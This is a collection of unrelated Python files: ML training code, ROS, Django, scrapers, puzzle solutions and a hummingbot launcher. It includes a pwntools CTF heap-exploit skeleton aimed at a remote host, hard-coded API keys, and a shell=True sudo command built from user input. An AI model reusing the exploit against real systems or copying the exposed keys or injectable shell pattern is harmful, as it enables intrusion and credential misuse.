loss_val, contribution_summary(loss_labels, loss_contributions_val)
)
logging_fn(val_report)
def wrap_up_early_stopping(self, best_model, currrent_loss, best_loss, best_epoch):
if best_loss is None or not np.isfinite(best_loss):
logger.warning("Loss is None, cannot wrap up early stopping")
elif currrent_loss is None or not np.isfinite(currrent_loss) or best_loss < currrent_loss:
logger.info(
"Early stopping after epoch %s, with loss %8.5f compared to final loss %8.5f",
best_epoch + 1,
best_loss,
currrent_loss,
)
self.model.load_state_dict(best_model)
else:
logger.info("Early stopping did not improve performance")
@staticmethod
def _check_for_nans(label, *tensors):
for tensor in tensors:
if tensor is None:
continue
if torch.isnan(tensor).any():
logger.warning("%s contains NaNs, aborting training! Data:\n%s", label, tensor)
raise NanException
class SingleParameterizedRatioTrainer(Trainer):
def __init__(self, model, run_on_gpu=True, double_precision=False):
super(SingleParameterizedRatioTrainer, self).__init__(model, run_on_gpu, double_precision)
self.calculate_model_score = True
def check_data(self, data):
data_keys = list(data.keys())
if "x" not in data_keys or "theta" not in data_keys or "y" not in data_keys:
raise ValueError("Missing required information 'x', 'theta', or 'y' in training data!")
for key in data_keys:
if key not in ["x", "theta", "y", "r_xz", "t_xz"]:
logger.warning("Unknown key %s in training data! Ignoring it.", key)
self.calculate_model_score = "t_xz" in data_keys
if self.calculate_model_score:
logger.debug("Model score will be calculated")
else:
logger.debug("Model score will not be calculated")
def make_dataset(self, data):
tensor_data = []
data_labels = []
for key, value in six.iteritems(data):
data_labels.append(key)
if key == "theta":
tensor_data.append(torch.tensor(value, requires_grad=True))
else:
tensor_data.append(torch.from_numpy(value))
dataset = TensorDataset(*tensor_data)
return data_labels, dataset
def forward_pass(self, batch_data, loss_functions):
theta = batch_data["theta"].to(self.device, self.dtype)
x = batch_data["x"].to(self.device, self.dtype)
y = batch_data["y"].to(self.device, self.dtype)
try:
r_xz = batch_data["r_xz"].to(self.device, self.dtype)
except KeyError:
r_xz = None
try:
t_xz = batch_data["t_xz"].to(self.device, self.dtype)
except KeyError:
t_xz = None
self._check_for_nans("Training data", theta, x, y)
self._check_for_nans("Augmented training data", r_xz, t_xz)
s_hat, log_r_hat, t_hat = self.model(theta, x, track_score=self.calculate_model_score, return_grad_x=False)
self._check_for_nans("Model output", s_hat, log_r_hat, t_hat)
losses = [loss_function(s_hat, log_r_hat, t_hat, None, y, r_xz, t_xz, None) for loss_function in loss_functions]
self._check_for_nans("Loss", *losses)
return losses
class DoubleParameterizedRatioTrainer(Trainer):
def __init__(self, model, run_on_gpu=True, double_precision=False):
super(DoubleParameterizedRatioTrainer, self).__init__(model, run_on_gpu, double_precision)
self.calculate_model_score = True
def check_data(self, data):
data_keys = list(data.keys())
if "x" not in data_keys or "theta0" not in data_keys or "theta1" not in data_keys or "y" not in data_keys:
raise ValueError("Missing required information 'x', 'theta0', 'theta1', or 'y' in training data!")
for key in data_keys:
if key not in ["x", "theta0", "theta1" "y", "r_xz", "t_xz0", "t_xz1"]:
logger.warning("Unknown key %s in training data! Ignoring it.", key)
self.calculate_model_score = "t_xz0" in data_keys or "t_xz1" in data_keys
if self.calculate_model_score:
logger.debug("Model score will be calculated")
else:
logger.debug("Model score will not be calculated")
def make_dataset(self, data):
tensor_data = []
data_labels = []
for key, value in six.iteritems(data):
data_labels.append(key)
if key in ["theta0", "theta1"]:
tensor_data.append(torch.tensor(value, requires_grad=True))
else:
tensor_data.append(torch.from_numpy(value))
dataset = TensorDataset(*tensor_data)
return data_labels, dataset
def forward_pass(self, batch_data, loss_functions):
theta0 = batch_data["theta0"].to(self.device, self.dtype)
theta1 = batch_data["theta1"].to(self.device, self.dtype)
x = batch_data["x"].to(self.device, self.dtype)
y = batch_data["y"].to(self.device, self.dtype)
try:
r_xz = batch_data["r_xz"].to(self.device, self.dtype)
except KeyError:
r_xz = None
try:
t_xz0 = batch_data["t_xz0"].to(self.device, self.dtype)
except KeyError:
t_xz0 = None
try:
t_xz1 = batch_data["t_xz1"].to(self.device, self.dtype)
except KeyError:
t_xz1 = None
self._check_for_nans("Training data", theta0, theta1, x, y)
self._check_for_nans("Augmented training data", r_xz, t_xz0, t_xz1)
s_hat, log_r_hat, t_hat0, t_hat1 = self.model(
theta0, theta1, x, track_score=self.calculate_model_score, return_grad_x=False
)
self._check_for_nans("Model output", s_hat, log_r_hat, t_hat0, t_hat1)
losses = [
loss_function(s_hat, log_r_hat, t_hat0, t_hat1, y, r_xz, t_xz0, t_xz1) for loss_function in loss_functions
]
self._check_for_nans("Loss", *losses)
return losses
class LocalScoreTrainer(Trainer):
def check_data(self, data):
data_keys = list(data.keys())
if "x" not in data_keys or "t_xz" not in data_keys:
raise ValueError("Missing required information 'x' or 't_xz' in training data!")
for key in data_keys:
if key not in ["x", "t_xz"]:
logger.warning("Unknown key %s in training data! Ignoring it.", key)
def forward_pass(self, batch_data, loss_functions):
x = batch_data["x"].to(self.device, self.dtype)
t_xz = batch_data["t_xz"].to(self.device, self.dtype)
self._check_for_nans("Training data", x)
self._check_for_nans("Augmented training data", t_xz)
t_hat = self.model(x)
self._check_for_nans("Model output", t_hat)
losses = [loss_function(t_hat, t_xz) for loss_function in loss_functions]
self._check_for_nans("Loss", *losses)
return losses
class FlowTrainer(Trainer):
def __init__(self, model, run_on_gpu=True, double_precision=False):
super(FlowTrainer, self).__init__(model, run_on_gpu, double_precision)
self.calculate_model_score = True
def check_data(self, data):
data_keys = list(data.keys())
if "x" not in data_keys or "theta" not in data_keys:
raise ValueError("Missing required information 'x' or 'theta' in training data!")
for key in data_keys:
if key not in ["x", "theta", "t_xz"]:
logger.warning("Unknown key %s in training data! Ignoring it.", key)
self.calculate_model_score = "t_xz" in data_keys
if self.calculate_model_score:
logger.debug("Model score will be calculated")
else:
logger.debug("Model score will not be calculated")
def make_dataset(self, data):
tensor_data = []
data_labels = []
for key, value in six.iteritems(data):
data_labels.append(key)
if key == "theta":
tensor_data.append(torch.tensor(value, requires_grad=True))
else:
tensor_data.append(torch.from_numpy(value))
dataset = TensorDataset(*tensor_data)
return data_labels, dataset
def forward_pass(self, batch_data, loss_functions):
x = batch_data["x"].to(self.device, self.dtype)
theta = batch_data["theta"].to(self.device, self.dtype)
try:
t_xz = batch_data["t_xz"].to(self.device, self.dtype)
except KeyError:
t_xz = None
self._check_for_nans("Training data", theta, x)
self._check_for_nans("Augmented training data", t_xz)
if self.calculate_model_score:
_, log_likelihood, t_hat = self.model.log_likelihood_and_score(theta, x)
else:
_, log_likelihood = self.model.log_likelihood(theta, x)
t_hat = None
self._check_for_nans("Model output", log_likelihood, t_hat)
losses = [loss_function(log_likelihood, t_hat, t_xz) for loss_function in loss_functions]
self._check_for_nans("Loss", *losses)
return losses
|
#!/usr/bin/python
#\file kuka_joint_states.py
#\brief Convert /iiwa/state/JointPosition topic to /joint_states.
#\author Akihiko Yamaguchi, info@akihikoy.net
#\version 0.1
#\date Jun.08, 2017
import roslib; roslib.load_manifest('iiwa_ros')
import rospy
import sensor_msgs.msg
import iiwa_msgs.msg
import copy
def Callback(pub_st, msg):
#remove_names= ('head_nod','torso_t0')
#if all(rmname not in msg.name for rmname in remove_names):
#pub_st.publish(msg)
#else:
#msg2= sensor_msgs.msg.JointState()
#msg2.header= msg.header
#idxs= [i for i,name in enumerate(msg.name) if name not in remove_names]
#msg2.name= [msg.name[i] for i in idxs]
#if len(msg.position)>0: msg2.position= [msg.position[i] for i in idxs]
#if len(msg.velocity)>0: msg2.velocity= [msg.velocity[i] for i in idxs]
#if len(msg.effort)>0: msg2.effort= [msg.effort[i] for i in idxs]
#pub_st.publish(msg2)
joint_names= ('a%d'%d for d in xrange(1,8))
msg2= sensor_msgs.msg.JointState()
msg2.header= msg.header
#idxs= [i for i,name in enumerate(msg.name) if name not in remove_names]
msg2.name= ['iiwa_joint_%d'%d for d in xrange(1,8)]
msg2.position= [getattr(msg.position,name) for name in joint_names]
#if len(msg.velocity)>0: msg2.velocity= [msg.velocity[i] for i in idxs]
#if len(msg.effort)>0: msg2.effort= [msg.effort[i] for i in idxs]
pub_st.publish(msg2)
if __name__=='__main__':
rospy.init_node('kuka_joint_states')
pub_st= rospy.Publisher('/joint_states', sensor_msgs.msg.JointState, queue_size=1)
sub_st= rospy.Subscriber('/iiwa/state/JointPosition', iiwa_msgs.msg.JointPosition, lambda msg: Callback(pub_st,msg))
rospy.spin()
|
import copy
class Solution(object):
def stoneGame(self, piles):
"""
:type piles: List[int]
:rtype: bool
"""
#should use backtrack
alex_sum = 0
total_sum = sum(piles)
return self._helper(piles, alex_sum, total_sum)
def _helper(self, remain_piles, alex_sum, total_sum):
if alex_sum > 0.5 * total_sum:
return True
if len(remain_piles) == 0:
return alex_sum > 0.5 * total_sum
for i in range(len(remain_piles)):
remain_piles_copy = copy.copy(remain_piles)
del remain_piles_copy[i]
if self._helper(remain_piles_copy, alex_sum + remain_piles[i], total_sum):
return True
return False
if __name__ == "__main__":
s = Solution()
piles = [5, 3, 4, 5]
print s.stoneGame(piles) |
# -*- coding: utf-8 -*-
#############
#
# Copyright - Nirlendu Saha
#
# author - nirlendu@gmail.com
#
#############
from __future__ import unicode_literals
import uuid
from datetime import datetime
from cassandra.cqlengine import columns
from cassandra.cqlengine.models import Model as ModelCassandra
class ChannelSecondary(ModelCassandra):
channel_secondary_id = columns.Text(primary_key=True, default=str(uuid.uuid4()).replace('-','')[:8], required=True)
channel_primary_id = columns.Text(index=True, required=True)
channel_name = columns.Text(required=True)
channel_unique_name = columns.Text(index=True, required=True)
channel_weight = columns.Decimal(default=0)
total_followers = columns.Integer(default=0)
channel_expression_list = columns.List(value_type=columns.Text(),default=[])
class PersonSecondary(ModelCassandra):
person_secondary_id = columns.Text(primary_key=True, default=str(uuid.uuid4()).replace('-','')[:12], required=True)
user_name = columns.Text(index=True, required=True)
person_primary_id = columns.Text(index=True, required=True)
person_name = columns.Text(required=True)
total_followers = columns.Integer(default=0)
person_weight = columns.Decimal(default=0)
person_channel_followee_list = columns.List(value_type=columns.Text(),default=[])
person_person_followee_list = columns.List(value_type=columns.Text(),default=[])
person_expression_list = columns.List(value_type=columns.Text(),default=[])
class ExpressionSecondary(ModelCassandra):
expression_secondary_id = columns.Text(primary_key=True, default=str(uuid.uuid4()).replace('-','')[:16], required=True)
expression_primary_id = columns.Text(index=True, required=True)
expression_owner_id = columns.Text(required=True)
expression_weight = columns.Decimal(default=0)
expression_content = columns.Text(required=True)
expression_content_url = columns.Text(default=None)
expression_imagefile = columns.Text(default=None)
broadcast_parent_id = columns.Text(default=None)
expression_time = columns.DateTime(default=datetime.now())
expression_channel = columns.List(value_type=columns.Text(),default=[])
total_upvotes = columns.Integer(default=0)
total_broadcasts = columns.Integer(default=0)
total_discussions = columns.Integer(default=0)
total_collects = columns.Integer(default=0)
expression_upvote_list = columns.List(value_type=columns.Text(),default=[])
expression_broadcast_list = columns.List(value_type=columns.Text(),default=[])
expression_discussion_list = columns.List(value_type=columns.Text(),default=[])
expression_collection_list = columns.List(value_type=columns.Text(),default=[])
class UrlSecondary(ModelCassandra):
url_secondary_id = columns.Text(primary_key=True, default=str(uuid.uuid4()).replace('-','')[:16],required=True)
url_primary_id = columns.Text(index=True, required=True)
url = columns.Text(index=True, required=True)
url_title = columns.Text(required=True)
url_desc = columns.Text(default=None)
url_imagefile = columns.Text(default=None)
url_weight = columns.Decimal(default=0) |
# go to
# and reset API key
# then CTRL+C CTRL+V it below
import cassiopeia as cass
from os.path import dirname, abspath
riot_api_key = "RGAPI-77619554-7949-4393-be68-5e643092e8b4"
config = cass.get_default_config()
# stores data to disk
# doesn't work with match history :(
config["pipeline"]["SimpleKVDiskStore"] = {
"package": "cassiopeia_diskstore",
"path": "{}/data".format(dirname(abspath(__file__)))
}
# # SQLStore not yet working
# config["pipeline"]["SQLStore"] = {
# "package": "cassiopeia_sqlstore",
# "path": "sqlite:///{}/data/foo.db".format(dirname(abspath(__file__)))
# }
cass.apply_settings(config)
cass.set_riot_api_key(riot_api_key)
cass.set_default_region("NA")
# Faker is the top rated player in LOL
summoner = cass.get_summoner(name="Faker")
print("{accountId}: {name} is a level {level} summoner on the {region} server."\
.format(accountId=summoner.id,
name=summoner.name,
level=summoner.level,
region=summoner.region)
)
#
# get Faker's match history his last match
# faker_match_history = summoner.match_history
# print("His match history is length: {}".format(len(faker_match_history)))
# faker_last_match_id = faker_match_history[0].id
faker_last_match_id = 2842707542
faker_last_match = cass.get_match(faker_last_match_id)
last_match_timeline = faker_last_match.timeline
print("last match frames: {}".format(len(last_match_timeline.frames)))
print("match length: {}".format(faker_last_match.duration))
last_match_frames = last_match_timeline.frames
# make a data folder
from os import path, getcwd, mkdir
data_folder_name = "data"
pwd = getcwd()
full_path = path.join(pwd, data_folder_name)
if not path.isdir(full_path):
mkdir(full_path)
# write data out to files
for frame in last_match_frames:
timestamp = frame.timestamp
print("Timestamp {}".format(timestamp))
file_name = "{}-{}".format(faker_last_match_id, timestamp)
# # write to json
# json_frame = frame.to_json()
# print(json_frame)
# with open(file_name, 'w') as fh:
# fh.write(json_frame)
# # write to CSV
import csv
with open(data_folder_name + "/" + file_name + ".csv", 'w+') as csvfile:
frame_writer = csv.writer(csvfile)
header = "matchId, timestamp, positionX, positionY, creepScore, currentGold, dominionScore, experience, goldEarned, level, neutralMinionsKilled, participantId, teamScore"
header = [word for word in header.replace(',', '').split(' ')]
frame_writer.writerow(header)
participantFrames = [value.to_dict() for key, value in frame.participant_frames.items()]
for pframe in participantFrames:
try:
pos_x = pframe['position']['x']
pos_y = pframe['position']['y']
except:
pos_x = 0
pos_y = 0
row = [faker_last_match_id, timestamp, pos_x, pos_y]
columns = [
'creepScore',
'currentGold',
'dominionScore',
'experience',
'goldEarned',
'level',
'neutralMinionsKilled',
'participantId',
'teamScore'
]
for col in columns:
row.append(pframe[col])
print(row)
frame_writer.writerow(row)
|
import numpy as np
import math
# 想清楚之后就是找最大连续子列的问题
# 洪水无法侵蚀已经画过的墙,所以找到子列以后一定可以全部画满
# 时间复杂度O(N)
output = open("./B-large-practice.out", 'w+')
with open('./B-large-practice.in') as fp:
T = int(fp.readline())
cur_rd = 1
while cur_rd <= T:
key = 'Case #'+str(int(cur_rd))+': '
cur_rd += 1
N = int(fp.readline().strip('\n'))
wall = fp.readline().strip('\n')
paint_num = int((len(wall)+1)/2)
cur = sum([int(n) for n in wall[0:paint_num]])
total = cur
for t in range(0, len(wall)-paint_num):
cur = cur - int(wall[t]) + int(wall[paint_num+t])
total = max(total, cur)
total_str = str(total)
print(key+total_str)
print('{0}'.format(key+total_str), file=output)
|
# Generated by Django 3.0.5 on 2020-04-21 06:53
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
('learning_logs', '0006_auto_20200421_0643'),
]
operations = [
migrations.AlterField(
model_name='entry',
name='date_added',
field=models.DateTimeField(auto_now_add=True),
),
migrations.AlterField(
model_name='entry',
name='text',
field=models.TextField(),
),
migrations.AlterField(
model_name='entry',
name='topic',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='learning_logs.Topic'),
),
migrations.AlterField(
model_name='topic',
name='date_added',
field=models.DateTimeField(auto_now_add=True),
),
migrations.AlterField(
model_name='topic',
name='text',
field=models.CharField(max_length=200),
),
]
|
# ! /usr/bin/env python
import requests
from bs4 import BeautifulSoup as BS
import time
def download(url):
# url = 'https://xs.sogou.com/chapter/14734139_481036348916/'
headers = {
'User-Agent': 'Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.100 Safari/537.36',
'Host': 'xs.sogou.com',
'Upgrade-Insecure-Requests': '1',
'Connection': 'keep-alive',
'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8',
}
response = requests.get(url, params=headers)
data = response.text
# print(data)
soup = BS(data, 'lxml')
paperdiv = soup.select('div[class="paper-box paper-article"]')[0]
# print(paperdiv)
paperh1 = soup.select('div[class="paper-box paper-article"] h1')[0].string
paperinfo = soup.select('div[class="paper-box paper-article"] div[class="info"]')[0].string
papercontent = soup.select('div[class="paper-box paper-article"] div[id="contentWp"]')[0].get_text()
print(paperh1 + '\n' + paperinfo + '\n' + papercontent + '\n')
# https://xs.sogou.com/chapter/14734139_481036348916/
# 整个小说
url = 'https://xs.sogou.com/list/14734139/'
headers = {
'User-Agent': 'Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.100 Safari/537.36',
}
response = requests.get(url, params=headers)
data = response.text
soup = BS(data, 'lxml')
papera = soup.select('ul[class="chapter clear"] a')
# print(papera)
for a in papera:
a = a.get('href') # href="/chapter/14734139_481036348916/"
pa = 'https://xs.sogou.com' + str(a) # 完整的url
# print(pa)
download(pa)
time.sleep(1)
|
import sys
from lxml import html
import requests
import urlparse
import os
import argparse
import re
def process_links(links, formats=["jpg", "png", "gif", "svg", "jpeg"]):
x = []
for l in links:
# TODO regular expressions
if os.path.splitext(l)[1][1:].strip().lower() in formats:
x.append(l)
return x
def get_arguments():
parser = argparse.ArgumentParser()
parser.add_argument('url2scrape', nargs=1, help="URL to scrape")
parser.add_argument('-m', '--max-images', type=int, default=0,
help="Limit on number of images")
parser.add_argument('-s', '--save-dir', type=str, default="images",
help="Directory in which images should be saved")
parser.add_argument('-g', '--injected', help="scrape injected images",
action="store_true")
parser.add_argument('--max-filesize', type=int, default=100000000,
help="Limit on size of image in bytes")
parser.add_argument('--dump-urls', default=False,
help="Print the URLs of the images",
action="store_true")
args = parser.parse_args()
URL = args.url2scrape[0]
if not re.match(r'^[a-zA-Z]+://', URL):
URL = 'http://' + URL
no_to_download = args.max_images
save_dir = args.save_dir + '_{uri.netloc}'.format(uri=urlparse.urlparse(URL))
download_path = os.path.join(os.getcwd(), save_dir)
use_ghost = args.injected
format_list = ["jpg", "png", "gif", "svg", "jpeg"]
max_filesize = args.max_filesize
dump_urls = args.dump_urls
return (URL, no_to_download, format_list, download_path, max_filesize,
dump_urls, use_ghost)
def process_download_path(download_path):
if os.path.exists(download_path):
if not os.access(download_path, os.W_OK):
sys.exit("Sorry, the directory can't be accessed.")
elif os.access(os.path.dirname(download_path), os.W_OK):
os.makedirs(download_path)
else:
sys.exit("Sorry, the directory can't be created.")
def get_html(URL, use_ghost):
if use_ghost:
URL = urlparse.urljoin("http://", URL)
import selenium
import selenium.webdriver
driver = selenium.webdriver.PhantomJS(service_log_path=os.path.devnull)
driver.get(URL)
page_html = driver.page_source
page_url = driver.current_url
driver.quit()
else:
try:
page = requests.get(URL)
except requests.exceptions.MissingSchema:
URL = "http://" + URL
page = requests.get(URL)
finally:
page_html = page.text
page_url = page.url
return (page_html, page_url)
def get_img_list(page_html, page_url, format_list):
tree = html.fromstring(page_html)
img = tree.xpath('//img/@src')
links = tree.xpath('//a/@href')
img_list = process_links(img, format_list)
img_links = process_links(links, format_list)
img_list.extend(img_links)
images = [urlparse.urljoin(page_url, url) for url in img_list]
images = list(set(images))
return images
def download_image(img_url, download_path, max_filesize):
img_request = None
success_flag = True
size_success_flag = True
try:
img_request = requests.request('get', img_url, stream=True)
except:
success_flag = False
print "download of %s failed; status code %s" % \
(img_url, img_request.status_code)
print "status : %s" % img_request.status_code
return success_flag
if int(img_request.headers['content-length']) < max_filesize:
img_content = img_request.content
f = open(os.path.join(download_path, img_url.split('/')[-1]), 'w')
f.write(img_content)
f.close()
else:
success_flag = False
size_success_flag = False
return success_flag, size_success_flag
|
# Level 13
# http://www.pythonchallenge.com/pc/return/disproportional.html
# C:\Users\pablo>curl -u huge:file http://www.pythonchallenge.com/pc/return/evil4.jpg
# Bert is evil! go back!
# Python Console
"""phonebook = xmlrpc.client.ServerProxy('http://www.pythonchallenge.com/pc/phonebook.php')
phonebook
phonebook.phone('Bert')
out '555-ITALY'"""
# Next level: http://www.pythonchallenge.com/pc/return/italy.html
|
from pwn import *
import sys
#import kmpwn
sys.path.append('/home/vagrant/kmpwn')
from kmpwn import *
#fsb(width, offset, data, padding, roop)
#config
context(os='linux', arch='i386')
context.log_level = 'debug'
FILE_NAME = "./babyheap"
#"""
HOST = "35.186.153.116"
PORT = 7001
"""
HOST = "localhost"
PORT = 7777
"""
if len(sys.argv) > 1 and sys.argv[1] == 'r':
conn = remote(HOST, PORT)
else:
conn = process(FILE_NAME)
#elf = ELF(FILE_NAME)
#addr_main = elf.symbols["main"]
#addr_bss = elf.bss()
#addr_dynsym = elf.get_section_by_name('.dynsym').header['sh_addr']
#
#libc = ELF('./')
#libc_binsh = next(libc.search("/bin/sh"))
def create(size, data):
conn.sendlineafter("> ", "1")
conn.sendlineafter(": ", str(size))
conn.sendafter(": ", data)
def delete(index):
conn.sendlineafter("> ", "2")
conn.sendlineafter(": ", str(index))
def show(index):
conn.sendlineafter("> ", "3")
conn.sendlineafter(": ", str(index))
conn.recvuntil("data: ")
def exploit():
b_data = "B"*0xf8
b_data += p64(0xc1)
b_data += "B"*(0x1b7-len(b_data))
create(0xf7, "A"*0xf7) #A 0
create(0x1b7, b_data) #B 1
create(0xf7, "C"*0xf7) #C 2
create(0xf7, "D"*0xf7) #D 3
delete(0)
create(0xf8, "A"*0xf8) #A 0
delete(0)
conn.interactive()
if __name__ == "__main__":
exploit()
|
#!/usr/bin/env python
# -*- coding: UTF-8 -*-
import tinify
import os
import os.path
tinify.key = "234-zhwWJVU50Y7X8b3FYEFtx8xWzVQv"
fromFilePath = ""
print "压缩图片脚本开始"
print "_____________________________________________\n"
index = 1;
sumOldfileByte = 0
sumnewfileByte = 0
for root, dirs, files in os.walk(fromFilePath):
for name in files:
fileName, fileSuffix = os.path.splitext(name)
if fileSuffix == '.png' or fileSuffix == '.jpg':
toFullPath = fromFilePath + root[len(fromFilePath):]
toFullName = toFullPath + '/' + name
fileByte = os.path.getsize(toFullName)
if fileByte > 1024*20 :
print "正在处理第" + str(index) + "图片:"
print toFullName
print("压缩前体积:")
print('%d Bytes'%(os.path.getsize(toFullName)))
sumOldfileByte = sumOldfileByte + os.path.getsize(toFullName)
index = index + 1
try:
source = tinify.from_file(toFullName)
source.to_file(toFullName)
except:
pass
print("压缩后体积:")
print('%d Bytes'%(os.path.getsize(toFullName)))
sumnewfileByte = sumnewfileByte + os.path.getsize(toFullName)
print "\n_____________________________________________"
print("压缩前总体积: " + str(sumOldfileByte) + "byte " + "约 " + str(sumOldfileByte/1024) + "kb " + str(sumOldfileByte/1024/1024) + "mb")
print("压缩后总体积: " + str(sumnewfileByte) + "byte " + "约 " + str(sumnewfileByte/1024) + "kb " + str(sumnewfileByte/1024/1024) + "mb")
print("压缩减少体积: " + str(sumOldfileByte - sumnewfileByte) + "byte" + "约 " + str((sumOldfileByte - sumnewfileByte)/1024) + "kb")
print "\n_____________________________________________"
print "压缩图片脚本结束"
|
from django.db import models
from django.utils.translation import ugettext_lazy as _
class Domain(models.Model):
domain = models.CharField(_('domain'), max_length=128, unique=True)
description = models.CharField(_('description'), max_length=128, blank=True, null=True)
active = models.BooleanField(_('is active'), default=False)
aliases = models.BooleanField(_('allow aliases'), default=False)
mailboxes = models.BooleanField(_('has mailboxes'), default=False)
backupmx = models.BooleanField(_('backup MX records'), default=False)
transport = models.CharField(_('transport'), max_length=128, blank=True, null=True)
created = models.DateTimeField(auto_now_add=True)
modified = models.DateTimeField(auto_now=True)
class Meta:
db_table = 'domains'
def __unicode__(self):
return u'%s' % self.domain
class Mailbox(models.Model):
domain = models.ForeignKey(Domain)
username = models.CharField(_('username'), max_length=255, unique=True,
help_text=_('Required. 255 characters or fewer. Letters, numbers and '
'@/./+/-/_ characters'))
password = models.CharField(_('password'), max_length=128)
maildir = models.CharField(_('mail directory'), max_length=128)
quote = models.PositiveIntegerField(_('quote'), default=0)
created = models.DateTimeField(auto_now_add=True)
modified = models.DateTimeField(auto_now=True)
class Meta:
db_table = 'mailboxes'
verbose_name = 'mail box'
verbose_name_plural = 'mail boxes'
unique_together = ('domain', 'username')
def __unicode__(self):
return u'%s' % self.username
class Alias(models.Model):
alias = models.CharField(max_length=128)
mailbox = models.ForeignKey(Mailbox)
domain = models.ForeignKey(Domain, null=True, blank=True)
active = models.BooleanField(_('is active'), default=False)
created = models.DateTimeField(auto_now_add=True)
modified = models.DateTimeField(auto_now=True)
class Meta:
db_table = 'aliases'
verbose_name = 'alias'
verbose_name_plural = 'aliases'
unique_together = ('alias', 'mailbox')
def __unicode__(self):
return u'%s for %s' % (self.alias, self.mailbox.username)
|
from django.contrib import admin
from main.models import Product, Clothing, UserPicture, Review
# Register your models here.
admin.site.register(Product)
admin.site.register(Clothing)
admin.site.register(UserPicture)
admin.site.register(Review) |
#!/usr/bin/env python2.7
# encoding: utf-8
"""
sim1.py
Created by Jakub Konka on 2011-04-20.
Copyright (c) 2011 University of Strathclyde. All rights reserved.
"""
import sys
import os
import SimPy.SimulationTrace as sim
class Car(sim.Process):
def __init__(self, name, cc):
sim.Process.__init__(self, name=name)
self.cc = cc
def go(self):
print("{0} {1} Starting".format(sim.now(), self.name))
yield sim.hold, self, 100.0
print("{0} {1} Arrived".format(sim.now(), self.name))
if __name__ == '__main__':
sim.initialize()
car1 = Car("Car1", 2000)
sim.activate(car1, car1.go(), at=6.0)
car2 = Car("Car2", 1600)
sim.activate(car2, car2.go())
sim.simulate(until=200)
print("Current time is {0}".format(sim.now()))
|
import numpy as np
import tensorflow as tf
import autokeras as ak
from tensorflow.keras.datasets import mnist
(x_train, y_train), (x_test, y_test) = mnist.load_data()
x_train = x_train.reshape(60000, 28, 28, 1).astype('float32') / 256.
x_test = x_test.reshape(10000, 28, 28, 1).astype('float32') / 256.
from tensorflow.keras.utils import to_categorical
y_train = to_categorical(y_train)
y_test = to_categorical(y_test)
model = ak.ImageClassifier(
overwrite=True,
max_trials=1,
loss='mse'
)
from tensorflow.keras.callbacks import EarlyStopping, ModelCheckpoint, ReduceLROnPlateau
es = EarlyStopping(monitor='val_loss', mode='min', patience=6)
lr = ReduceLROnPlateau(monitor='val_loss', patience=3, factor=0.5, verbose=2)
ck = ModelCheckpoint('./keras3/', save_weights_only=True, save_best_only=True, monitor='val_loss')
model.fit(x_train, y_train, epochs=1, validation_split=0.2, callbacks=[es, lr, ck])
results = model.evaluate(x_test, y_test)
print(results)
# model.summary()
model2 = model.export_model()
model2.save('./keras3/save/aaa.h5')
best_model = model.tuner.get_best_model()
best_model.save('./keras3/save/best_aaa.h5')
# [loss , acc]
# [0.07032570987939835, 0.0036045669112354517] |
#!/usr/bin/env python
import path_util # noqa: F401
import argparse
import asyncio
import logging
from typing import (
Coroutine,
List,
)
import os
import subprocess
from hummingbot import (
check_dev_mode,
init_logging,
)
from hummingbot.client.hummingbot_application import HummingbotApplication
from hummingbot.client.config.global_config_map import global_config_map
from hummingbot.client.config.config_helpers import (
create_yml_files,
write_config_to_yml,
read_system_configs_from_yml,
update_strategy_config_map_from_file,
all_configs_complete,
)
from hummingbot.client.ui import login_prompt
from hummingbot.client.ui.stdout_redirection import patch_stdout
from hummingbot.core.utils.async_utils import safe_gather
from hummingbot.core.management.console import start_management_console
from bin.hummingbot import (
detect_available_port,
)
from hummingbot.client.settings import CONF_FILE_PATH
from hummingbot.client.config.security import Security
class CmdlineParser(argparse.ArgumentParser):
def __init__(self):
super().__init__()
self.add_argument("--config-file-name", "-f",
type=str,
required=False,
help="Specify a file in `conf/` to load as the strategy config file.")
self.add_argument("--wallet", "-w",
type=str,
required=False,
help="Specify the wallet public key you would like to use.")
self.add_argument("--config-password", "--wallet-password", "-p",
type=str,
required=False,
help="Specify the password to unlock your encrypted files and wallets.")
self.add_argument("--auto-set-permissions",
type=str,
required=False,
help="Try to automatically set config / logs / data dir permissions, "
"useful for Docker containers.")
def autofix_permissions(user_group_spec: str):
project_home: str = os.path.realpath(os.path.join(__file__, "../../"))
subprocess.run(f"cd '{project_home}' && "
f"sudo chown -R {user_group_spec} conf/ data/ logs/", capture_output=True, shell=True)
async def quick_start(args):
config_file_name = args.config_file_name
wallet = args.wallet
password = args.config_password
if args.auto_set_permissions is not None:
autofix_permissions(args.auto_set_permissions)
if password is not None and not Security.login(password):
logging.getLogger().error("Invalid password.")
return
await Security.wait_til_decryption_done()
await create_yml_files()
init_logging("hummingbot_logs.yml")
read_system_configs_from_yml()
hb = HummingbotApplication.main_application()
# Todo: validate strategy and config_file_name before assinging
if config_file_name is not None:
hb.strategy_file_name = config_file_name
hb.strategy_name = update_strategy_config_map_from_file(os.path.join(CONF_FILE_PATH, config_file_name))
# To ensure quickstart runs with the default value of False for kill_switch_enabled if not present
if not global_config_map.get("kill_switch_enabled"):
global_config_map.get("kill_switch_enabled").value = False
if wallet and password:
global_config_map.get("ethereum_wallet").value = wallet
if hb.strategy_name and hb.strategy_file_name:
if not all_configs_complete(hb.strategy_name):
hb.status()
with patch_stdout(log_field=hb.app.log_field):
dev_mode = check_dev_mode()
if dev_mode:
hb.app.log("Running from dev branches. Full remote logging will be enabled.")
log_level = global_config_map.get("log_level").value
init_logging("hummingbot_logs.yml",
override_log_level=log_level,
dev_mode=dev_mode)
if hb.strategy_file_name is not None and hb.strategy_name is not None:
await write_config_to_yml(hb.strategy_name, hb.strategy_file_name)
hb.start(log_level)
tasks: List[Coroutine] = [hb.run()]
if global_config_map.get("debug_console").value:
management_port: int = detect_available_port(8211)
tasks.append(start_management_console(locals(), host="localhost", port=management_port))
await safe_gather(*tasks)
def main():
args = CmdlineParser().parse_args()
# Parse environment variables from Dockerfile.
# If an environment variable is not empty and it's not defined in the arguments, then we'll use the environment
# variable.
if args.config_file_name is None and len(os.environ.get("CONFIG_FILE_NAME", "")) > 0:
args.config_file_name = os.environ["CONFIG_FILE_NAME"]
